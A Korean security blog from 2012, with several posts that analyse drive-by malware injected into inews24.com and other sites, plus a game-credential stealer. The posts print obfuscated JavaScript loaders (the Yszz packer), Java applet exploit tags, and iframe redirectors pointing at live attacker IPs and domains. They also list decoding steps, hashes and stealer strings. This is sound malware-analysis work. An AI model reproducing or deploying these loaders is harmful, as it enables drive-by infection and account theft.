posted by Kwan's 2012. 9. 21. 22:45

이제는 지친다!!! inews24.com 에서 유포중이다!

주말마다 관리자는 무엇을 하고있을까??



내부 소스에는 이와같이 스페이스와 탭으로 이루어진! 스크립트가 삽입!


document.write(unescape("%3Cscript%20src%3Dhttp%3A%2F%2F205%2E164%2E5%2E190%2Fpic%2Fimg%2Ejs%3E%3C%2Fscript%3E"));


--------------------------------------------------------------------------------------------


<script src=http://205.164.5.190/pic/img.js>

 ~>http://205.164.5.190/pic/img.html (Yszz 1.3 vip)

    ~>http://205.164.5.190/pic/swfobject.js
    ~>http://205.164.5.190/pic/jpg.js
 ~>http://205.164.5.190/pic/css.html (입!)

    ~> http://count24.51yes.com/click.aspx?id=249419322&logo=1


(Yszz 1.3 vip)


var MDIxo="%78"+"%6F";
var OIai8="%78"+"%6F"+"%31";
생략
var ERb7H="%6F"+"%78";
var XGpwn2 =MDIxo+OIai8+HHYWv+CvXWz+JZyjl+ERb7H,AVgHbu2f=unescape,Cn6T4bG0znIi="aQCLHa58Cy3fSGI3MeP1sEO

KRLywbDXIIzBxULkgBn/D0nB/kT9MVqK/29rPw+7wspSSX4qYH3H4TMrS3lDaseKuZ+5ydruhSG6XAlVl81Fqy/9y5cz3aprjhQx6MLTaMoj9q650TsrPzkXNwh+Z77NWOlZvxX7bOFMlKO7BdlwwlwnujykUFSoyNi8snQ+N90mn7nOnAIzNndUPtUkLV/+B1YT9M1u+RRtR7fwCuD1F07IFFzf1aSbcqtdf2NMKG6xhSPeynlrxqj3uDGf41xlplDX8xIv0fepd4XsS+jZP0D0iy/B5RfpVqyMzuBPycllafgA9zCmrLhtJ0OmdlfXsc22xMemu1U6BxUyQMGxAokvOwqpdb+W9Sk2QCmcqsMewdHbk/Jfbqbee2cW9YtHv29tJaQo8WB7+7fZvONnukFDbr3ifuZTi6aT3gB4mHIazWfWZzKBTqhU2Nq

SqIM8cUmhw6TD+Wu/rlVT5SWujvvnaX9xYRSaNmOfrcrdRlS8838eJuA9RF

생략

+5f/QUEljDMY7HL0QPa0a087YViC/IbXMKTHlhaKoQM+IOuE5Gwz3GjltVa+yIvONfdD+c2uDwP4Q=",HUx2Ydz="%64"+"%6f"+"%63"+"%75"+"%6d"+"%65"+"%6e"+"%74",

sac5pxhFS="%77"+"%72"+"%69"+"%74"+"%65",ubo8KLEZHIPX2;
var B83pNx = "%53"+"%74"+"%72"+"%69"+"%6e"+"%67";
var WjuQFO = "%66"+"%72"+"%6f"+"%6d"+"%43"+"%68"+"%61"+"%72"+"%43"+"%6f"+"%64"+"%65";
var fxTmFiR = AVgHbu2f(B83pNx);
var xZW9RVt = AVgHbu2f(WjuQFO);
var sATWUn = "%41"+"%72"+"%72"+"%61"+"%79";
var x83QqGV = AVgHbu2f(sATWUn);
function tzWmUni(str){var out,i,len,c;var char2,char3;out=[];len=str.length;i=0;while(i<len){c=str.charCodeAt(i++);switch(c>>4)
{case 0:case 1:case 2:case 3:case 4:case 5:case 6:case 7:out[out.length]=str.charAt(i-1);break;case 12:case 13:char2=str.charCodeAt(i++);out[out.length]=window[fxTmFiR][xZW9RVt](((c&0x1F)<<6)|(char2&0x3F));break;case 14:char2=str.charCodeAt(i++);char3=str.charCodeAt(i++);out[out.length]=window[fxTmFiR][xZW9RVt](((c&0x0F)<<12)|((char2&0x3F)<<6)|((char3&0x3F)<<0));break;}}
return out.join('');}
var ZjykejU6Chars=new window[x83QqGV](-1,-1,-1,생략
7,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,4

7,48,49,50,51,-1,-1,-1,-1,-1);
HUx2Ydz=AVgHbu2f(HUx2Ydz);
function ZjykejU6(str)
{var YS1,YS2,YS3,YS4;/*Yszz 1.3 vip*/var i,len,out;
len=str.length;i=0;out = "";
while(i<len)
{do{YS1=ZjykejU6Chars[str.charCodeAt(i++)&0xff]}while(i<len&&YS1==-1);
if(YS1==-1)
break;do{YS2=ZjykejU6Chars[str.charCodeAt(i++)&0xff]}while(i<len&&YS2==-1);
if(YS2==-1)
break;out+=window[fxTmFiR][xZW9RVt]((YS1<<2)|((YS2&0x30)>>4));
do{YS3=str.charCodeAt(i++)&0xff;if(YS3==61)
return out;
YS3=ZjykejU6Chars[YS3]}while(i<len&&YS3==-1);
if(YS3==-1)
break;out+=window[fxTmFiR][xZW9RVt](((YS2&0XF)<<4)|((YS3&0x3C)>>2));
do{YS4=str.charCodeAt(i++)&0xff;if(YS4==61)
return out;YS4=ZjykejU6Chars[YS4]}while(i<len&&YS4==-1);if(YS4==-1)
break;out+=window[fxTmFiR][xZW9RVt](((YS3&0x03)<<6)|YS4)}
return out}
function long2str(v,w){var vl=v.length;var sl=v[vl-1]&0xffffffff;for(var i=0;i<vl;i++)
{v[i]=window[fxTmFiR][xZW9RVt](v[i]&0xff,v[i]>>>8&0xff,v[i]>>>16&0xff,v[i]>>>24&0xff);}
if(w){return v.join('').substring(0,sl);}
else{return v.join('');}}
function str2long(s,w){var len=s.length;var v=[];for(var i=0;i<len;i+=4)
{v[i>>2]=s.charCodeAt(i)|s.charCodeAt(i+1)<<8|s.charCodeAt(i+2)<<16|s.charCodeAt(i+3)<<24;}
if(w){v[v.length]=len;}
return v;}
ubo8KLEZHIPX2=AVgHbu2f(XGpwn2);
function kaixin(str,Udkz){if(str==""){return"";}
var v=str2long(str,false);var k=str2long(Udkz,false);var n=v.length-1;var z=v[n-1],y=v[0],delta=0x9E3779B9;var mx,e,q=Math.floor(6+52/(n+1)),sum=q*delta&0xffffffff;while(sum!=0){e=sum>>>2&3;for(var p=n;p>0;p--){z=v[p-1];mx=(z>>>5^y<<2)+(y>>>3^z<<4)^(sum^y)+(k[p&3^e]^z);y=v[p]=v[p]-mx&0xffffffff;}
z=v[n];mx=(z>>>5^y<<2)+(y>>>3^z<<4)^(sum^y)+(k[p&3^e]^z);y=v[0]=v[0]-mx&0xffffffff;sum=sum-delta&0xffffffff;}
return long2str(v,true);}
sac5pxhFS=AVgHbu2f(sac5pxhFS);
JS0W=Cn6T4bG0znIi;
JS0W=tzWmUni(kaixin(ZjykejU6(JS0W), ubo8KLEZHIPX2));
window[HUx2Ydz][sac5pxhFS] (JS0W);


-----------------------------------------------------------------------------------------------





중요한 부분!


kaixin.archive="K03rSYoG.jpg";
kaixin.code="GondadGondadExp.class";
kaixin.setAttribute("dota","http://209.73.158.76/css/img.css");
document.body.appendChild(kaixin);

OBJECT classid='clsid:8AD9C840-044E-11D1-B3E9-00805F499D93


document.write("<br>");
var kaixinq = document.createElement("body");
document.body.appendChild(kaixinq);
var kaixiny = document.createElement("applet");
kaixiny.width = "256";
kaixiny.height = "256";
kaixiny.archive = "tRMfS.jpg";
kaixiny.code = "cve2012xxxx.Gondvv.class";
kaixiny.setAttribute("xiaomaolv", "http://209.73.158.76/css/img.css");
kaixiny.setAttribute("bn", "woyouyizhixiaomaolv");
kaixiny.setAttribute("si", "conglaiyebuqi");
kaixiny.setAttribute("bs", "748");
document.body.appendChild(kaixiny);


else {

var pcss=navigator.userAgent.toLowerCase();
var UaYcKzD2 = window.navigator.userAgent.toLowerCase();
if ((UaYcKzD2.indexOf('msie 8.0') > -1))
{

  document.writeln("<iframe src=LihTNR.html( Yszz 1.3 vip )><\/iframe>");

}

else if ((UaYcKzD2.indexOf('msie 6.0') > -1) || (UaYcKzD2.indexOf('msie 7.0') > -1))
{

  document.writeln("<iframe src=mO4b9.html( Yszz 1.3 vip )><\/iframe>");

}


연결지 정리 !


* 접속이 되어서 감염시 본인의 책임이라는 것을 알려 드립니다!


http://205.164.5.190/pic/img.js
~>http://205.164.5.190/pic/img.html (Yszz 1.3 vip)

        ~>  http://209.73.158.76/css/img.css (최종파일)

        ~>  tRMfS.jpg,  cve2012xxxx.Gondvv.class, mO4b9.html, LihTNR.html
    ~>http://205.164.5.190/pic/swfobject.js
    ~>http://205.164.5.190/pic/jpg.js
~>http://205.164.5.190/pic/css.html (취약점 미삽입!)
    ~>http://count24.51yes.com/click.aspx?id=249419322&logo=1


MD5 및 바이러스 토탈 결과 !


fd095a3357e85b4f4e5c27a9269ca021 css.html

https://www.virustotal.com/file/71254e55af538c134152bcbdd73a5c105990deb95fe5f83f34f1c27ad1db3518/analysis/1348234483/


bf1ca09bb8d9198d852a6b1ba68a355d Gondvv.class

https://www.virustotal.com/file/d15d49f0d7b4eb87ec89e7ac94bbc760e3e3000f89f46500d11ff5955f3ada17/analysis/1348234486/


acb18b560c15f972dbfbe7df5b5a8ae7 Gondzz.class

https://www.virustotal.com/file/9d44689791cb1d0c43be5fbbf6db660b826c5ac489a07a18d000780d0778fcb9/analysis/1348234489/


140c02cb07a6bf56a7b4a22020f03716 img.css

https://www.virustotal.com/file/de413e18f48bc2b461a2a7b2ae5680c104a89b71246ebcf734dc280fe6a218de/analysis/1348234508/


3c15a098eac02881b93014685a766674 img.html

https://www.virustotal.com/file/5a58dc316120d348d32e890146bfdd591d79e114e2dec6ef2f568fe923c89d93/analysis/1348234694/


6987108c7f85c4b6f097598433a3819f img.js

https://www.virustotal.com/file/06e0202eafcbc5aaf07f53be2c1e5004d84c61d62e17841d6252b4b5dbd13808/analysis/1348234699/


97c9b5b98c75bc4d20ccd6f8e28b0a7b jpg.js

https://www.virustotal.com/file/58c7d8245f33850b15212768e29489b6eded7ddbbfcda08e0d7d335c29df7a93/analysis/1348234724/


6c6799dd660ceda52cf31a46a34e3e3c LihTNR.html

https://www.virustotal.com/file/73206be591fd7db6b3342c7b091edc8f10865760e9d186870d64463c89f90484/analysis/1348234705/


5a38c126e782bc11206c7237967ad8f3 mO4b9.html

https://www.virustotal.com/file/db7c60c8f23ea1f7f0ec20726420d9eae9d2de4957704cdd23323dbd0930d243/analysis/1348234818/


de89a5739a7e333071160a552aa32b63 swfobject.js

https://www.virustotal.com/file/29ee593945dd3785157a2808e007505fb36113e3f025b4a581b0e8d333393caf/analysis/1348234827/


8990ccdbed763ef8aa3943b085313f88 tRMfS.zip

https://www.virustotal.com/file/12d81179803bd331f37383b3a2f6625af12c9fc4c2dde8d4a5dfac9df20e7a89/analysis/1348234883/


샘플 필요시 댓글 주세요!    아이뉴스 샘플.zip * 암호 설정중!


지난 아이뉴스 유포 글!


2012/09/01 - [security/악성코드 유포] - http://www.inews24.com 악성코드 유포중 !

2012/06/30 - [security/악성코드 유포] - 악성코드 유포중에 있는 inews24.com 악성 스크립트 정리 !

2012/06/29 - [security/악성코드 유포] - inews24.com 내에 공백을 이용한 악성 스크립트 살펴보기 !


댓글을 달아 주세요

posted by Kwan's 2012. 9. 17. 18:56

Agent.aye         V3LTray.exe         nsavsvc.npc         ws2_32.dll  WSCEnumProtocols    % w s   o v e r   % w s     W i n S o c k e t A . d l l     WSCWriteProviderOrder   WSCInstallProvider  WSCGetProviderPath  ole32.dll   CoCreateGuid    SHLWAPI.dll StrStrIW    WSCDeinstallProvider    SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\   LoadAppInit_DLLs    W i n S o c k e t A     %s.%s.tmp   \WindowsEx.dll  \WinSocketA.dll \lpk.dll    shlwapi.dll PathFileExistsA PromptOnSecureDesktop   EnableLUA   ConsentPromptBehaviorAdmin  SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System   RegCloseKey RegSetValueExA  RegOpenKeyA ADVAPI32.dll    %s\%s   \ws2helpxp.dll  \ws2help.dll    GetMessageA GetInputState   PostThreadMessageA  user32.dll


PASSWORD    World   USERNAME    \AionLog.ini    PM_shareReadWrite   var mystr =     b98tyu43213456789fucp569876 asd2g93kliportyt5uoanrbyvuc versionno=  firefoxpi=  strEncData= LoginID=    szPasswd    c   teencash.co.kr  userID= dk.halgame.com  &pwd=   game_id=13& aion.plaync.co.kr   pw  mabinogi.nexon.com  %*[^=]=%[^&]&%*[^=]=%[0-9a-zA-Z]    &password   accountName kr.battle.net   left    strLeftPw=  strLeftID=  right   no  &id=    dflogin=    info4=8 &sbanner=   nexon.com   %*[^=]=%[^&]&[0-9]  g_txtAuthNum=   gnxMapleOTPLoginAuthContainer   &strPassword=   &strEmail=  &keyname=   nxtURL= hangame.com %*[^=]=%[^&]&%*[^=]=%[^&]&  l_pwd=  l_id=   netmarble.net   l_domain=www.netmarble.net  %*[^=]=%[^&]&   usrid=  passwd= page_gameid=raycity page_gameid=fifaonline  page_gameid=www page_domain=pmang.com   pmang.com   this.AosGetText4 = function (elementObj){var e1=aos_get_text4(elementObj,1);var e2="";if(elementObj.value.length > 12){e2 = aos_get_text4(elementObj,2);}e2=aos_get_text2(elementObj);return [e1,e2];}/*------------------------------------------------------*/    this.AosGetText4 = function (elementObj)    function aos_get_text4(obj,order){var a="";try{a=MKD25.GetText4(obj,order);document.getElementById("sbanner").value=MKD25.GetText2(obj);return a;}catch(e){}return a;}/*------------*/  function aos_get_text4( obj, order )    NgbClientForm.AddChildForSubform( 'strLeftID', %s );

NgbClientForm.AddChildForSubform( 'strLeftPw', %s );


airyclient.exe LUOHAN  \LUOHANLog.ini  GetWindowTextA                                                                                                                                                                                                                                             ff2client.exe   FIFA    \FFLog.ini  InterlockedIncrement    kernel32.dll    iexplore.exe                                        dnf.exe                                             MapleStory.exe                                      lin.bin                                             ff2client.exe                                       heroes.exe                                          ExLauncher.exe                                      TERA.exe                                            OTP.exe                                             AION.bin                                            wow.exe                                             explorer.exe                                        raycity.exe         dkonline.exe        x2.exe              InphaseNXD.exe                                      AYAgent.aye                                         AYUpdSrv.aye                                        AYServiceNT.aye                                     AYRTSrv.aye                                         ALYac.aye                                           SystemMon.exe                                       SkyMon.exe                                          nsvmon.npc                                          nvc.npc                                             nvcagent.npc                                        Nsavsvc.npc                                         NaverAgent.exe                                      V3LTray.exe                                         V3LSvc.exe                                          V3Light.exe                                         SgSvc.exe                                           InjectWinSockServiceV3.exe                          aosrts.exe                                          aosbackv.exe                                        procscan                                            fairyclient.exe                                     aostray.exe                                         Diablo III.exe                                      

ws2helpxp.dll  WahCloseApcHelper   WahCloseHandleHelper    WahCloseNotificationHandleHelper    WahCloseSocketHandle    WahCloseThread  WahCompleteRequest  WahCreateHandleContextTable WahCreateNotificationHandle WahCreateSocketHandle   WahDestroyHandleContextTable    WahDisableNonIFSHandleSupport   WahEnableNonIFSHandleSupport    WahEnumerateHandleContexts  WahInsertHandleContext  WahNotifyAllProcesses   WahOpenApcHelper    WahOpenCurrentThread    WahOpenHandleHelper WahOpenNotificationHandleHelper WahQueueUserApc WahReferenceContextByHandle WahRemoveHandleContext  WahWaitForNotification  cationHandleHelper  c : \ W i n d o w s \ c o m     WSPStartup  ws2help.dll alyac   sgrun.exe   


전형적인 게임 탈취 목적으로 보이는 악성코드 같이 보인다! 

특히 ws2helpxp.dll로 바꿔치기하는 전형적인 방법이 아직도 쓰이는걸 보니...

아직도 꽤 많은 이용자가 이 방법을 통해 유출이 되는거 같다! 게임탈취뿐 아니라 OTP에 백신까지도

정말 생각을 많이 하는거 같다!


이제는 사후가아닌 사전에 막는것이 되어서 사용자가 이런일이 없도록 방지하는 방법이 정착이 되었으면 한다!


PS. 올만에 실행시켰더니 ㅠㅠㅠㅠㅠ 버벅버벅 힘들다 ㅠㅠㅠㅠ


댓글을 달아 주세요

posted by Kwan's 2012. 9. 1. 16:30

* 현재 감염된 사이트 입니다. 접속시에 감염이 될 수 있으니 유의하시기 바랍니다!


근원지 : http://www.inews24.com 내 스크립트 !


1차 연결 : http://69.46.86.221/pic/img.js


2차 아이프레임 : http://69.46.86.221/pic/img.js

~> http://69.46.86.221/pic/img.html (404 Not Found)

~> http://69.46.86.221/pic/css.html (익스플로릿 미삽입)


[inews24 내 스크립트]


function RDfADFLDEXDFu5(s) {var r = new Array();var curr = 0;while(s.charAt(curr) != '\n') {var tmp = 0;for (var i=6; i>=0 ; i-- ){if (s.charAt(curr) == ' '){tmp = tmp | (Math.pow(2,i));}curr++;}r.push(alert(tmp));}return r.join('');}if(document.cookie.indexOf("ERTDSDFF")==-1 || document.cookie.indexOf("WERXRF2")==-1)Function(RDfADFLDEXDFu5(" [중략]\n"))();var cookiename = document.cookie.indexOf("ERTDSDFF") == -1 ? "ERTDSDFF" : "WERXRF2";var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie=cookiename+"=Yes;path=/;expires="+expires.toGMTString();

-----------------------------------------------------------------------------------------------


[디코딩]


100,111,99,117,109,101,110,116,46,119,114,105,116,[생략],34,41,41,59


~>document.write(unescape("%3Cscript%20sr[생략t]%3E"));

~> <script src=http://69.46.86.221/pic/img.js></script> 연결 !


[img.js 스크립트]


var DkilOy=navigator.userAgent.toLowerCase();

if(document.cookie.indexOf("AdVvKHCY")==-1 && DkilOy.indexOf("bot")==-1 && DkilOy.indexOf("spider")==-1 && DkilOy.indexOf("linux")==-1&& DkilOy.indexOf("Safari")==-1)

{

var expires=new Date();

expires.setTime(expires.getTime()+24*60*60*1000);

document.cookie="AdVvKHCY=Yes;path=/;expires="+expires.toGMTString();

document.write("<iframe width=\"116\" height=\"1\" frameborder=\"0\" src=\"http://69.46.86.221/pic/img.html\"></iframe>");

document.write("<iframe width=\"116\" height=\"1\" frameborder=\"0\" src=\"http://69.46.86.221/pic/css.html\"></iframe>");

}


-----------------------------------------------------------------------------------------------


http://69.46.86.221/pic/img.html


=========================

Server IP(s):

0.0.0.0

=========================

HTTP headers: 

HTTP/1.1 404 Not Found


http://69.46.86.221/pic/css.html ~> 익스플로릿 미삽입!



댓글을 달아 주세요

posted by Kwan's 2012. 8. 25. 19:57


메인 스크립트 !


<script>s="";h=-016/7;try{q=document.createElement("p");a=(q)?"appendC":12;q[a+"hild"](""+n);}catch(qw){f=(q)?"fromCharCode":2;try{eval("a=prototype");}catch(zxc){e=window["eva"+"l"];n="52.50.[생략].91.40".split(".");if(window.document)for(i=6-2-1-2-1;-161+i<0;i=1+i){k=i;s=s+String[f](n[k]/(i%(h*h)+4));}e(s);}}</script>


----------------------------------------------------------------------------------------------


디코딩을 위한 변형 ! 


<script>

s="";h=-016/7;try{q=document.createElement("p");a=(q)?"appendC":12;q[a+"hild"](""+n);}catch(qw){f=(q)?"fromCharCode":2;try{eval("a=prototype");}catch(zxc){e=window["eva"+"l"];n="52.50.600.[생략]1.40".split(".");if(window.document)for(i=6-2-1-2-1;-161+i<0;i=1+i){k=i;s=alert(document.write(String[f](n[k]/(i%(h*h)+4))));}e(s);}}

</script>


디코딩 후 !


<iframe src="http://evdyvaz.ru/count17.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>


현재 서버는 죽어있는 상태입니다!


=========================

Server IP(s):

0.0.0.0

=========================



댓글을 달아 주세요

posted by Kwan's 2012. 8. 11. 11:09


[악성 스크립트]


 function c102916999516m4943389011261(m4943389011648)

 {

   function m4943389011a31()

   {

     var m4943389011e19=16;

     return m4943389011e19;

   }

   return (parseInt(m4943389011648,m4943389011a31()));

 }

 function m49433890125ea(m49433890129d2)

 {

   var m4943389013589=2;

   var m4943389012dba='';

   m4943389014143=String.fromCharCode;

   for(m49433890131a2=0;m49433890131a2<m49433890129d2.length;m49433890131a2+=m4943389013589)

   {

     m4943389012dba+=(m4943389014143(c102916999516m4943389011261(m49433890129d2.substr(m49433890131a2,m4943389013589))));

   }

   return m4943389012dba;

 }

 var z89='';

 var m4943389014917='3C7'+z89+'3637'+z89+'2697'+z89+'07'+z89+'43E696628216D7'+z89+'96961297'+z8[중략]';

document.write(m49433890125ea(m4943389014917))


[디코딩]


---------------------------

웹 페이지의 메시지

---------------------------

<script>if(!myia){document.write(unescape( '%3c%69%66%72%61[중략]%65%3e'));}var myia=true;</script>

---------------------------

확인   

---------------------------


[HEX 디코딩]


<script>if(!myia){document.write(unescape( '<iframe name=c10 src='hXXp://gogo2me.net/.go/check.html?'+Math.round(Math.random()*441780)+'53ebedca2' width=796 height=555 style='display: none'></iframe>'));}var myia=true;</script>


[링크 정리]


최초 페이지 : hxxp://insaweb9.cafe24.com/bbs/login.php?id=best

iframe 연결 : hxxp://gogo2me.net/.go/check.html?

frame 연결 : hxxp://ww1.gogo2me.net

최종 연결 : hxxp://dsparking.com/?epl=BuMcp4amXBdAWsCMnIJ0Z4C2x48RJBROkdzFv8QqzkJ4Ay1CXlxfQ6mi61vN0pPAoOmoXXBgdmlh6Kicts9kZcc0IhH9Vq6Gtobv5oNuGaFAFOK6wEvwlRCIYioJpGfY9zPLjIhnGiFIJ2eWQ8ruVVzYpcOFgqBaZ5r975LUC4SpplPK4OQBu9zgFyDHBgMK6glEw1kwqCot4FuQc67dqY1xmsphQpFN5T73rcKLa0f5wXH3m1H-yQ4BxYYmEkVIc9ocXX2MFxjYFlmSTLGs7d863edJt4Xr6E7PcBlwb6z67kPP1cfgtBAuo-KlChGDjZMx9m2rLj97RSSSkjTj43wKfbaH8Uq-DD3UrmIZKAjSGDqjUueK1pbNkCdH-B2oSs5TQl45ngI8oFxUs-WJXFoTnCn8MPuS4TAaUI8GqAcyDQDUo5Ge9FBPmZ7aFE9FAIB6IKMB6dGoJz31QKb6SU95oMmUpyKUUT-lR6ZN9YNGeoIpHo1qTzUNPfVTI9J7qpn0VNEsLQEw8P__v_D__7_y_wMAAECAXw8AANoeP0ZZUyZZQTE2aFpClAEAAPA


hxxp://ww1.gogo2me.net?epl=Up_MRQiLp0w607k_C8ICdwDLC8kfEgqnSO7iRrI_BtcJeODFzQ-jZnaN67qWUo1O8zsWeCBxWS_adJTTtpsoiD55i0SVyKgwITinR5GwBulQgTiGXwppNtIRtmLj3tJv_BrvV0IQN0L51Aoyhr_9YAK-E115DY09ZgVSM6499eXEPnyiMn7DYN0SZ9c8WImC3STQbi3pe1VjdwCL8Uo6CvfV6xFjJk0-ETP50EiGwQKsRgWbySVlcjpwttDVpv7seO49LtPh9oBcg3M9ihhVJTVe3XBLfe9ShwhI4V4UxTHu-Z_kOUxbmI2ytetLI1t-o412qJYgmGFxsZ1TBHKDd4fAIGQxWQxYbXBhxtJ1uU07PxomPJgwqWydab3L8vO8AxC-sCxlMmKaaUoPU5t6apjQJrUR06b01KaYplH_VAU01KapBzSNpiGASU8w0UzANE2mIgaaJhMAAKYJEyYAE2DCHBMWATDw__-_8P__v_L_AwAAQIDfDAAAWF5I_llTJllBMTZoWkJqAQAA8A


최종 연결지는 현재 접속이 안되고 있습니다 !

=========================
Server IP(s):
0.0.0.0
=========================


댓글을 달아 주세요

posted by Kwan's 2012. 6. 30. 10:07

최초 감염 페이지 : http://inews24.cox/js_lib/slide_new.js

                          http://lzxvx.com/pix/rot.html

                          http://lzxvx.com/pix/ll.html

                                ~>최종 파일 : http://oppo.ltevc.com/csx/8191i.css

                                ~> <iframe src=nBQVd.html>

                                ~> 최종파일 : http://oppo.ltevc.com/csx/8191i.css

                                ~> <iframe src=utEWY.html>

                                 ~> 최종파일 : http://oppo.ltevc.com/csx/8191i.css

                            http://lzxvx.com/pix/swfobject.js

                            http://lzxvx.com/pix/jpg.js



var Yszz1="%59"+"%73"+"%7A"+"%7A"+"%30"+"%30";var Yszz2="%78"+"%78"+"%6F"+"%6F"+"%78"+"%78";var Yszz3="%30"+"%30";var pkucde =Yszz1+Yszz2+Yszz3,AVgHbu2f=unescape,cu1l2lp3s2z="WdQOuGkE6OzRFoogdm06G5/

ZwORxIFg6MUdLmoM5TsOjunE3gpAu2UamKTbHI579p8YjKzukIY0iiGPnAzuoELwFCBvivDq

Vsp0xEJqsYhv4fmgbTn+l6gS/ZSmfWq7bYYj75F4qDqKDCzsDYf4SUhxtoWikabVa5kxYA61CR

qLyfN4lvEaSErH/pSIFZzVo8h0GQicb2PyxrigX6tUz4e8idBmR9NmHu997aWdIhxnSIhFG7+M+C

WV38iEKKUoOpWsHLNYR408rdFKuBRLVB9mqfzoO/A9Ov5p6WH2GKnXUhZ8p1lKnIAhbrZLrzI

+b5dk84M2M1S118FCy0GHhhq6MDnc3Q2yxcvukLdHaW3kkmd2u+1ZWAvZ0IpXSPAmI6vrv4dy

eq88RSCzeWTubmBD9MFlnEisRNIp/FuGWxDo9EbnmXp6uClXdRfwTgU5iraHQKcZU0ax43fE

Z4FRRdGAk1N66BNBGy8h6iYdsTcOBIJEKWpRWGuwc/4d9CRMnb9p8FOSFgQB+cet/8v4Z6

Eqd9lg9ARlEPRfn/XDfp+QbkH3R3A8JTUZlZ5h4p/qC4WLVHr2AmrA2S3/L4A07CmltBEBCmq

+Spg2Y9yRMZBYr3ZHxryCvJ3aI5CXm79TrJnrf+spRlidyzGSHFPTceqTqnozmJWRhn0sBT3eh

/PM/5cu0EH5gyUCeeJAstulZwOXCA9zrtHmB1KKP//LWZhHZHZx4LSR9swW/U4xCghmBiQO

//qbbXPD+PAkKnb/5j5qT5EjtrD/z+[중략]

/wBrtEEWSiNuj1SdT3xzOTTaM2Di0TPIiXdZ0BPFlDaSYWgxYFVmntCd1D8A9idlpJcQfWH1YK30ve

YjWcwRpgGapbfUUYx0KOdPU/5+Di4brvdJSlwemIjIe2kphz/91BznRNjmkjLLwtrxcJzmDT1NZSQtb

EGAZi3lK+u6YzEXBU9ORYn8kOK1S5uWZfGf7OHXmE6iNUVMYnSl/EVsNR1zVSgNqVcxzFDsMk

Aq6BY61q8tYX2sCfmc+hOOZ+TWM6rOBHvQ5KQBT+JKChWM0ehMxTK2kMNzCNFimMMuXRcw

euE+8Qib7AVU5S3dadoHXmTgMCGQNQxeLHqHY6/yUSShom1BNfHtDbOU3kvtsmejRQsqnRTjfv2

9L3lcWgbf1BupXZ3AUu0rn7Sil5NOavlnkP1acXwnhJZmpLPcPyc59p92nRB14cmtzyuQmy1tx0kZpM

gpQz3uf4IEBq2mouQl7LdEIlTJIngCkkxKkw2zoDx5ri0UxhHj6KqOSHO+lP59zry40nfG3WnO+cpJGGj

xczB4DNgvSG9NCKO9EnYY4fT8Fhc9rfY6DM26vldSdPJY5eOnVNTjIRrijSlbDSgLS9OBTt5A==",MxAAS="%64"+"%6f"+"%63"+"%75"+"%6d"+"%65"+"%6e"+"%74",UAXzqa1="%77"+"%72"+"%69"+"%74"+"%65",Kxllz1z;function Yszz_v1(str){var out,i,len,c;var char2,char3;out=[];len=str.length;i=0;while(i<len){c=str.charCodeAt(i++);switch(c>>4)

{case 0:case 1:case 2:case 3:case 4:case 5:case 6:case 7:out[out.length]=str.charAt(i-1);break;case 12:case 13:char2=str.charCodeAt(i++);out[out.length]=String.fromCharCode(((c&0x1F)<<6)|(char2&0x3F));break;case 14:char2=str.charCodeAt(i++);char3=str.charCodeAt(i++);out[out.length]=String.fromCharCode(((c&0x0F)<<12)|((char2&0x3F)<<6)|((char3&0x3F)<<0));break;}}

return out.join('');}

var kaixindecodeChars=new Array(-1,-1,-1,-1,-1,-1,[중략],1,-1);

MxAAS=AVgHbu2f(MxAAS);

function kaixindecode(str)

{var c1,c2,c3,c4;/*Yszz 0.3*/var i,len,out;len=str.length;i=0;out = "";while(i<len)

{do

{c1=kaixindecodeChars[str.charCodeAt(i++)&0xff]}while(i<len&&c1==-1);if(c1==-1)

break;do

{c2=kaixindecodeChars[str.charCodeAt(i++)&0xff]}while(i<len&&c2==-1);if(c2==-1)

break;out+=String.fromCharCode((c1<<2)|((c2&0x30)>>4));do

{c3=str.charCodeAt(i++)&0xff;if(c3==61)

return out;c3=kaixindecodeChars[c3]}while(i<len&&c3==-1);if(c3==-1)

break;out+=String.fromCharCode(((c2&0XF)<<4)|((c3&0x3C)>>2));do

{c4=str.charCodeAt(i++)&0xff;if(c4==61)

return out;c4=kaixindecodeChars[c4]}while(i<len&&c4==-1);if(c4==-1)

break;out+=String.fromCharCode(((c3&0x03)<<6)|c4)}

return out}

function long2str(v,w){var vl=v.length;var sl=v[vl-1]&0xffffffff;for(var i=0;i<vl;i++)

{v[i]=String.fromCharCode(v[i]&0xff,v[i]>>>8&0xff,v[i]>>>16&0xff,v[i]>>>24&0xff);}

if(w){return v.join('').substring(0,sl);}

else{return v.join('');}}

function str2long(s,w){var len=s.length;var v=[];for(var i=0;i<len;i+=4)

{v[i>>2]=s.charCodeAt(i)|s.charCodeAt(i+1)<<8|s.charCodeAt(i+2)<<16|s.charCodeAt(i+3)<<24;}

if(w){v[v.length]=len;}

return v;}

Kxllz1z=AVgHbu2f(pkucde);

function kaixin(str,Udkz){if(str==""){return"";}

var v=str2long(str,false);var k=str2long(Udkz,false);var n=v.length-1;var z=v[n-1],y=v[0],delta=0x9E3779B9;var mx,e,q=Math.floor(6+52/(n+1)),sum=q*delta&0xffffffff;while(sum!=0){e=sum>>>2&3;for(var p=n;p>0;p--){z=v[p-1];mx=(z>>>5^y<<2)+(y>>>3^z<<4)^(sum^y)+(k[p&3^e]^z);y=v[p]=v[p]-mx&0xffffffff;}

z=v[n];mx=(z>>>5^y<<2)+(y>>>3^z<<4)^(sum^y)+(k[p&3^e]^z);y=v[0]=v[0]-mx&0xffffffff;sum=sum-delta&0xffffffff;}

return long2str(v,true);}

UAXzqa1=AVgHbu2f(UAXzqa1);

Dz=cu1l2lp3s2z;

Dz=Yszz_v1(kaixin(kaixindecode(Dz), Kxllz1z));window[MxAAS][UAXzqa1] (Dz);


var RWkTTC8=navigator.userAgent.toLowerCase();

if(document.cookie.indexOf("Udz1szV=")==-1 && RWkTTC8.indexOf("bot")==-1 && RWkTTC8.indexOf("spider")==-1 && RWkTTC8.indexOf("linux")==-1)

{

var jHiJb2=deconcept.SWFObjectUtil.getPlayerVersion();

var expires=new Date();

expires.setTime(expires.getTime()+24*60*60*1000);

document.cookie="Udz1szV=Yes;path=/;expires="+expires.toGMTString();

var kaixiny=document.createElement('body');

document.body.appendChild(kaixiny);

var kaixinm=deployJava.getJREs()+"";

kaixinm=parseInt(kaixinm.replace(/\.|\_/g,''));

if (kaixinm<=17002)

{

